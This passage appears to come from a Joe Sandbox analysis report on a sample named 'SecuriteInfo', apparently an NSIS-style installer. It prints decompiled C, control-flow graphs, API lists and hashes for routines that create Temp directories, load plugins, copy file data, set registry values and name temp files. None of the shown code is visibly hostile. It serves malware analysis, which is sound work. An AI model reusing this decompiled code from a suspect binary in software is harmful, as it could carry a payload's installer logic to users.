                                                                                    control_flow_graph 599 405b99-405be4 CreateDirectoryW 600 405be6-405be8 599->600 601 405bea-405bf7 GetLastError 599->601 602 405c11-405c13 600->602 601->602 603 405bf9-405c0d SetFileSecurityW 601->603 603->600 604 405c0f GetLastError 603->604 604->602
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                    0x00405ba4
                                                                                    0x00405ba8
                                                                                    0x00405bab
                                                                                    0x00405bb1
                                                                                    0x00405bb5
                                                                                    0x00405bb9
                                                                                    0x00405bc1
                                                                                    0x00405bc8
                                                                                    0x00405bce
                                                                                    0x00405bd5
                                                                                    0x00405bdc
                                                                                    0x00405be4
                                                                                    0x00405be6
                                                                                    0x00000000
                                                                                    0x00405be6
                                                                                    0x00405bf0
                                                                                    0x00405bf7
                                                                                    0x00405c0d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405c0f
                                                                                    0x00405c13

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                    • GetLastError.KERNEL32 ref: 00405BF0
                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                    • GetLastError.KERNEL32 ref: 00405C0F
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 3449924974-3355392842
                                                                                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                    • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                    • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E21817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 605 70e21817-70e21856 call 70e21bff 609 70e21976-70e21978 605->609 610 70e2185c-70e21860 605->610 611 70e21862-70e21868 call 70e2243e 610->611 612 70e21869-70e21876 call 70e22480 610->612 611->612 617 70e218a6-70e218ad 612->617 618 70e21878-70e2187d 612->618 619 70e218af-70e218cb call 70e22655 call 70e21654 call 70e21312 GlobalFree 617->619 620 70e218cd-70e218d1 617->620 621 70e21898-70e2189b 618->621 622 70e2187f-70e21880 618->622 643 70e21925-70e21929 619->643 626 70e218d3-70e2191c call 70e21666 call 70e22655 620->626 627 70e2191e-70e21924 call 70e22655 620->627 621->617 628 70e2189d-70e2189e call 70e22e23 621->628 624 70e21882-70e21883 622->624 625 70e21888-70e21889 call 70e22b98 622->625 632 70e21890-70e21896 call 70e22810 624->632 633 70e21885-70e21886 624->633 639 70e2188e 625->639 626->643 627->643 636 70e218a3 628->636 642 70e218a5 632->642 633->617 633->625 636->642 639->636 642->617 648 70e21966-70e2196d 643->648 649 70e2192b-70e21939 call 70e22618 643->649 648->609 651 70e2196f-70e21970 GlobalFree 648->651 655 70e21951-70e21958 649->655 656 70e2193b-70e2193e 649->656 651->609 655->648 658 70e2195a-70e21965 call 70e215dd 655->658 656->655 657 70e21940-70e21948 656->657 657->655 659 70e2194a-70e2194b FreeLibrary 657->659 658->648 659->655
                                                                                    C-Code - Quality: 88%
                                                                                    			E70E21817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				void* _t39;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x70e2506c = _a8;
				 *0x70e25070 = _a16;
				 *0x70e25074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x70e25048, E70E21651);
				_push(1);
				_t37 = E70E21BFF();
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E70E2243E(_t54);
					}
					_push(_t54);
					E70E22480(_t67);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_push(_t54);
								_t37 = E70E22655();
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x1018; // 0x1018
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E70E21666(_t54,  &_v136);
								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
								_t18 = _t54 + 0x1018; // 0x1018
								_t72 = _t18;
								_push(_t54);
								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
								 *_t72 = 4;
								E70E22655();
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							_push(_t54);
							E70E22655();
							_t37 = GlobalFree(E70E21312(E70E21654(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E70E22618(_t54);
							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x1008);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
								_t37 = E70E215DD( *0x70e25068);
							}
						}
						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							_t39 = GlobalFree(_t54); // executed
							return _t39;
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E70E22E23(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E70E22B98(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E70E22810(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}



















                                                                                    0x70e21817
                                                                                    0x70e21817
                                                                                    0x70e21817
                                                                                    0x70e21824
                                                                                    0x70e2182c
                                                                                    0x70e21839
                                                                                    0x70e21847
                                                                                    0x70e2184a
                                                                                    0x70e2184c
                                                                                    0x70e21851
                                                                                    0x70e21856
                                                                                    0x70e21978
                                                                                    0x70e21978
                                                                                    0x70e2185c
                                                                                    0x70e21860
                                                                                    0x70e21863
                                                                                    0x70e21868
                                                                                    0x70e21869
                                                                                    0x70e2186a
                                                                                    0x70e21870
                                                                                    0x70e21876
                                                                                    0x70e218a6
                                                                                    0x70e218ad
                                                                                    0x70e218d1
                                                                                    0x70e2191e
                                                                                    0x70e2191f
                                                                                    0x70e218d3
                                                                                    0x70e218d3
                                                                                    0x70e218d4
                                                                                    0x70e218dd
                                                                                    0x70e218de
                                                                                    0x70e218e8
                                                                                    0x70e218eb
                                                                                    0x70e218f0
                                                                                    0x70e218f7
                                                                                    0x70e218f7
                                                                                    0x70e218fd
                                                                                    0x70e218fe
                                                                                    0x70e21904
                                                                                    0x70e2190a
                                                                                    0x70e21917
                                                                                    0x70e21918
                                                                                    0x70e2191b
                                                                                    0x70e218af
                                                                                    0x70e218af
                                                                                    0x70e218b0
                                                                                    0x70e218c5
                                                                                    0x70e218c5
                                                                                    0x70e21929
                                                                                    0x70e2192c
                                                                                    0x70e21939
                                                                                    0x70e21940
                                                                                    0x70e21948
                                                                                    0x70e2194b
                                                                                    0x70e2194b
                                                                                    0x70e21948
                                                                                    0x70e21958
                                                                                    0x70e21960
                                                                                    0x70e21965
                                                                                    0x70e21958
                                                                                    0x70e2196d
                                                                                    0x00000000
                                                                                    0x70e2196f
                                                                                    0x70e21970
                                                                                    0x00000000
                                                                                    0x70e21970
                                                                                    0x70e2196d
                                                                                    0x70e2187a
                                                                                    0x70e2187d
                                                                                    0x70e2189b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e2189e
                                                                                    0x70e218a3
                                                                                    0x70e218a3
                                                                                    0x70e218a5
                                                                                    0x00000000
                                                                                    0x70e218a5
                                                                                    0x70e2187f
                                                                                    0x70e21880
                                                                                    0x70e21888
                                                                                    0x70e21889
                                                                                    0x00000000
                                                                                    0x70e21889
                                                                                    0x70e21882
                                                                                    0x70e21883
                                                                                    0x70e21891
                                                                                    0x00000000
                                                                                    0x70e21891
                                                                                    0x70e21886
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21886

                                                                                    APIs
                                                                                      • Part of subcall function 70E21BFF: GlobalFree.KERNEL32(?), ref: 70E21E74
                                                                                      • Part of subcall function 70E21BFF: GlobalFree.KERNEL32(?), ref: 70E21E79
                                                                                      • Part of subcall function 70E21BFF: GlobalFree.KERNEL32(?), ref: 70E21E7E
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 70E218C5
                                                                                    • FreeLibrary.KERNEL32(?), ref: 70E2194B
                                                                                    • GlobalFree.KERNELBASE(00000000), ref: 70E21970
                                                                                      • Part of subcall function 70E2243E: GlobalAlloc.KERNEL32(00000040,?), ref: 70E2246F
                                                                                      • Part of subcall function 70E22810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70E21896,00000000), ref: 70E228E0
                                                                                      • Part of subcall function 70E21666: wsprintfW.USER32 ref: 70E21694
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.15006371066.0000000070E21000.00000020.00000001.01000000.00000004.sdmp, Offset: 70E20000, based on PE: true
                                                                                    • Associated: 00000001.00000002.15006311880.0000000070E20000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006427903.0000000070E24000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.15006474894.0000000070E26000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_70e20000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3962662361-3916222277
                                                                                    • Opcode ID: 98a37a598e8e7514a3a1dca7eb8ef7b7475bc07485a6b4a711877fded8ff06d7
                                                                                    • Instruction ID: 20c015751e8084530dd181822eb7ade2c2a9fa81a7359f41648cc23d3bb09e78
                                                                                    • Opcode Fuzzy Hash: 98a37a598e8e7514a3a1dca7eb8ef7b7475bc07485a6b4a711877fded8ff06d7
                                                                                    • Instruction Fuzzy Hash: 4141B372400A45AECB099F30FDC5B9D37ECBF14356F1444A9F9069A286DBB496898BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 662 403479-4034a1 GetTickCount 663 4035d1-4035d9 call 40302e 662->663 664 4034a7-4034d2 call 4035f8 SetFilePointer 662->664 669 4035db-4035df 663->669 670 4034d7-4034e9 664->670 671 4034eb 670->671 672 4034ed-4034fb call 4035e2 670->672 671->672 675 403501-40350d 672->675 676 4035c3-4035c6 672->676 677 403513-403519 675->677 676->669 678 403544-403560 call 406bb0 677->678 679 40351b-403521 677->679 684 403562-40356a 678->684 685 4035cc 678->685 679->678 681 403523-403543 call 40302e 679->681 681->678 688 40356c-403574 call 40620a 684->688 689 40358d-403593 684->689 687 4035ce-4035cf 685->687 687->669 692 403579-40357b 688->692 689->685 691 403595-403597 689->691 691->685 693 403599-4035ac 691->693 694 4035c8-4035ca 692->694 695 40357d-403589 692->695 693->670 696 4035b2-4035c1 SetFilePointer 693->696 694->687 695->677 697 40358b 695->697 696->663 697->693
                                                                                    C-Code - Quality: 94%
                                                                                    			E00403479(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x420ef4; // 0x1c1bac
				_t34 = _t32 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t10 =  *0x420ef8; // 0xa0b2d
					_t31 = 0x4000;
					_t11 = _t10 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x420f00; // 0xd19c2
						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40ec64
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4; // 0x1c1bac
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

















                                                                                    0x0040347c
                                                                                    0x00403489
                                                                                    0x0040349c
                                                                                    0x004034a1
                                                                                    0x004035d1
                                                                                    0x004035d3
                                                                                    0x00000000
                                                                                    0x004035d9
                                                                                    0x004034ad
                                                                                    0x004034c0
                                                                                    0x004034c6
                                                                                    0x004034cc
                                                                                    0x004034d7
                                                                                    0x004034d7
                                                                                    0x004034dc
                                                                                    0x004034e1
                                                                                    0x004034e9
                                                                                    0x004034eb
                                                                                    0x004034eb
                                                                                    0x004034f4
                                                                                    0x004034fb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403501
                                                                                    0x00403507
                                                                                    0x0040350d
                                                                                    0x00000000
                                                                                    0x00403513
                                                                                    0x00403519
                                                                                    0x00403523
                                                                                    0x00403539
                                                                                    0x0040353e
                                                                                    0x00403543
                                                                                    0x00403549
                                                                                    0x0040354f
                                                                                    0x00403559
                                                                                    0x00403560
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403562
                                                                                    0x00403568
                                                                                    0x0040356a
                                                                                    0x0040358d
                                                                                    0x00403593
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403595
                                                                                    0x00403597
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403599
                                                                                    0x00403599
                                                                                    0x004035ac
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004035bb
                                                                                    0x00000000
                                                                                    0x004035bb
                                                                                    0x00403574
                                                                                    0x0040357b
                                                                                    0x004035c8
                                                                                    0x004035ce
                                                                                    0x004035ce
                                                                                    0x00000000
                                                                                    0x004035ce
                                                                                    0x0040357d
                                                                                    0x00403583
                                                                                    0x00403589
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004035cc
                                                                                    0x004035cc
                                                                                    0x00000000
                                                                                    0x004035cc
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0040348D
                                                                                      • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                    • SetFilePointer.KERNELBASE(001C1BAC,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePointer$CountTick
                                                                                    • String ID: d@
                                                                                    • API String ID: 1092082344-3443089334
                                                                                    • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                    • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                    • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                    • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 698 40248a-4024bb call 402da6 * 2 call 402e36 705 4024c1-4024cb 698->705 706 402c2a-402c39 698->706 707 4024cd-4024da call 402da6 lstrlenW 705->707 708 4024de-4024e1 705->708 707->708 711 4024e3-4024f4 call 402d84 708->711 712 4024f5-4024f8 708->712 711->712 716 402509-40251d RegSetValueExW 712->716 717 4024fa-402504 call 403371 712->717 720 402522-402603 RegCloseKey 716->720 721 40251f 716->721 717->716 720->706 721->720
                                                                                    C-Code - Quality: 85%
                                                                                    			E0040248A(void* __eax, int __ebx, intOrPtr __edx, void* __eflags) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t42 = __eflags;
				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x20));
				_t34 = __eax;
				 *(_t39 - 0x10) =  *(_t39 - 0x1c);
				 *(_t39 - 0x44) = E00402DA6(2);
				_t20 = E00402DA6(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402E36(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402DA6(0x23);
						_t24 = lstrlenW(0x40b5f8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402D84(3);
						_pop(_t32);
						 *0x40b5f8 = _t27;
						 *((intOrPtr*)(_t39 - 0x38)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E00403371(_t32,  *((intOrPtr*)(_t39 - 0x24)), _t30, 0x40b5f8, 0x1800); // executed
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x44), _t30,  *(_t39 - 0x10), 0x40b5f8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey(); // executed
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}















                                                                                    0x0040248a
                                                                                    0x0040248a
                                                                                    0x0040248a
                                                                                    0x0040248a
                                                                                    0x0040248d
                                                                                    0x00402494
                                                                                    0x0040249e
                                                                                    0x004024a1
                                                                                    0x004024aa
                                                                                    0x004024b1
                                                                                    0x004024b8
                                                                                    0x004024bb
                                                                                    0x004024c1
                                                                                    0x004024cb
                                                                                    0x004024cf
                                                                                    0x004024da
                                                                                    0x004024da
                                                                                    0x004024e1
                                                                                    0x004024e5
                                                                                    0x004024ea
                                                                                    0x004024eb
                                                                                    0x004024f1
                                                                                    0x004024f4
                                                                                    0x004024f4
                                                                                    0x004024f8
                                                                                    0x00402504
                                                                                    0x00402504
                                                                                    0x00402515
                                                                                    0x0040251d
                                                                                    0x0040251f
                                                                                    0x0040251f
                                                                                    0x00402522
                                                                                    0x004025fd
                                                                                    0x004025fd
                                                                                    0x00402c2d
                                                                                    0x00402c39

                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg40B0.tmp,00000023,00000011,00000002), ref: 004024D5
                                                                                    • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg40B0.tmp,00000000,00000011,00000002), ref: 00402515
                                                                                    • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg40B0.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseValuelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsg40B0.tmp
                                                                                    • API String ID: 2655323295-144126854
                                                                                    • Opcode ID: 97273d8746b4edc30ea182101a24ea63f96e6aa4bdf951ca949c13b9677c97f4
                                                                                    • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                    • Opcode Fuzzy Hash: 97273d8746b4edc30ea182101a24ea63f96e6aa4bdf951ca949c13b9677c97f4
                                                                                    • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 723 406187-406193 724 406194-4061c8 GetTickCount GetTempFileNameW 723->724 725 4061d7-4061d9 724->725 726 4061ca-4061cc 724->726 728 4061d1-4061d4 725->728 726->724 727 4061ce 726->727 727->728
                                                                                    C-Code - Quality: 100%
                                                                                    			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                    0x0040618d
                                                                                    0x00406193
                                                                                    0x00406194
                                                                                    0x00406194
                                                                                    0x00406199
                                                                                    0x0040619a
                                                                                    0x0040619d
                                                                                    0x004061a2
                                                                                    0x004061a5
                                                                                    0x004061af
                                                                                    0x004061bc
                                                                                    0x004061c0
                                                                                    0x004061c8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061cc
                                                                                    0x00000000
                                                                                    0x004061ce
                                                                                    0x004061ce
                                                                                    0x004061ce
                                                                                    0x004061d1
                                                                                    0x004061d4
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004061A5
                                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
